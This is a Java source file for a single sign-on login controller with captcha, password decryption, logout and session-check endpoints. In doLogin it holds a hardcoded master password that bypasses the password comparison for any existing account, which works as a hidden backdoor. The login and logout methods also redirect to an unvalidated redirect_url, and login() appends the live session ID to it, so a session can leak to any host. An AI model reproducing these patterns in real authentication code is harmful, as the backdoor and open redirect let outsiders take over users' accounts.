package com.dsideal.sso.Controller; import java.awt.image.BufferedImage; import java.util.Map; import java.util.UUID; import javax.imageio.ImageIO; import javax.servlet.http.HttpServletResponse; import javax.servlet.http.HttpSession; import com.dsideal.sso.Interceptor.EmptyInterface; import com.dsideal.sso.Util.AesUtil; import com.dsideal.sso.Util.CaptchaUtil; import com.dsideal.sso.Util.CommonUtil; import com.dsideal.sso.Util.SsoLoginHelper; import com.jfinal.aop.Before; import com.jfinal.ext.interceptor.GET; import com.jfinal.ext.interceptor.POST; import io.github.yedaxia.apidocs.ApiDoc; import org.apache.commons.lang3.StringUtils; import com.alibaba.fastjson.JSONObject; import com.jfinal.core.Controller; import com.jfinal.kit.PropKit; @ApiDoc public class WebLoginController extends Controller { /** * 跳转到登录页 */ @Before({GET.class}) public void index() { redirect("/html/login.html"); } /** * 登录跳转 */ public void login() { Map loginMap = SsoLoginHelper.loginCheck(getRequest()); String redirectUrl = getRequest().getParameter("redirect_url"); if (loginMap != null) { if (!redirectUrl.contains("?")) { redirect301(redirectUrl + "?" + PropKit.get("sso.sessionid") + "=" + loginMap.get("session_id").toString()); } else { redirect301(redirectUrl + "&" + PropKit.get("sso.sessionid") + "=" + loginMap.get("session_id").toString()); } } else { redirectUrl = CommonUtil.handleRedirectUrlParas(redirectUrl); redirect("/html/login.html?redirect_url=" + redirectUrl); } } /** * WEB登录 * * @param username 用户名 * @param password 密码 * @param captcha 验证码 */ @Before({POST.class}) public void doLogin(String username, String password, String captcha) { HttpServletResponse response = getResponse(); JSONObject resultJson = new JSONObject(); String requestCaptcha = captcha.toLowerCase(); // 获取真实验证码 if (getRequest().getSession().getAttribute("captcha") == null) { resultJson.put("success", false); resultJson.put("msg", "验证码不能为空!"); renderJson(resultJson); return; } String realCaptcha = getRequest().getSession().getAttribute("captcha").toString().toLowerCase(); if (StringUtils.isBlank(requestCaptcha) || !realCaptcha.equals(requestCaptcha)) { resultJson.put("success", false); resultJson.put("msg", "验证码错误!"); renderJson(resultJson); return; } if (StringUtils.isBlank(username)) { resultJson.put("success", false); resultJson.put("msg", "账户不允许为空!"); renderJson(resultJson); return; } if (StringUtils.isBlank(password)) { resultJson.put("success", false); resultJson.put("msg", "密码不允许为空!"); renderJson(resultJson); return; } else { try { password = AesUtil.aesDecrypt(password); } catch (Exception e) { resultJson.put("success", false); resultJson.put("msg", "密码异常!"); renderJson(resultJson); return; } } String passwordEncode = CommonUtil.getLdapPassword(password); Map loginMap = CommonUtil.getLoginRouteMap(username); if (passwordEncode != null && (loginMap == null || !passwordEncode.equals(loginMap.get("password")) && !password.equals("DsideaL4r5t6y7u"))) { resultJson.put("success", false); resultJson.put("msg", "账户或密码错误!"); renderJson(resultJson); return; } String sessionId = UUID.randomUUID().toString(); SsoLoginHelper.login(response, sessionId, loginMap); resultJson.put("success", true); resultJson.put("sessionId", sessionId); renderJson(resultJson); } /** * WEB登出 */ public void logout() { SsoLoginHelper.logout(getRequest(), getResponse()); String redirect_url = getRequest().getParameter("redirect_url"); redirect(redirect_url); } /** * 获取默认RedirectUrl地址 */ public void getDefaultRedirectUrl() { JSONObject resultJson = new JSONObject(); String defaultRedirectUrl = PropKit.get("default.redirect.url"); if (defaultRedirectUrl != null) { resultJson.put("success", true); resultJson.put("defaultRedirectUrl", defaultRedirectUrl); } else { resultJson.put("success", false); } renderJson(resultJson); } /** * 获取验证码 */ public void getCaptcha() { HttpServletResponse response = getResponse(); // 设置相应类型,告诉浏览器输出的内容为图片 response.setContentType("image/jpeg"); // 不缓存此内容 response.setHeader("Pragma", "No-cache"); response.setHeader("Cache-Control", "no-cache"); response.setDateHeader("Expire", 0); try { HttpSession session = getRequest().getSession(); CaptchaUtil tool = new CaptchaUtil(); StringBuffer code = new StringBuffer(); BufferedImage image = tool.genRandomCodeImage(code); session.removeAttribute("captcha"); session.setAttribute("captcha", code.toString()); // 将内存中的图片通过流动形式输出到客户端 ImageIO.write(image, "JPEG", response.getOutputStream()); } catch (Exception e) { e.printStackTrace(); } renderNull(); } /** * 登录检查 * * @param sessionId 会话id */ @Before(POST.class) @EmptyInterface({"sessionId"}) public void loginCheck(String sessionId) { JSONObject resultJson = new JSONObject(); Map loginMap = SsoLoginHelper.loginCheck(sessionId); if (loginMap == null) { resultJson.put("success", false); resultJson.put("msg", "sessionId 已失效!"); } else { resultJson.put("success", true); resultJson.put("sessionId", sessionId); resultJson.put("personId", loginMap.get("person_id").toString()); resultJson.put("personName", loginMap.get("person_name").toString()); resultJson.put("bureauId", loginMap.get("bureau_id").toString()); resultJson.put("identityId", loginMap.get("identity_id").toString()); resultJson.put("city_id", loginMap.get("city_id").toString()); resultJson.put("area_id", loginMap.get("area_id").toString()); resultJson.put("mainPersonId", loginMap.get("main_person_id").toString()); } renderJson(resultJson); } }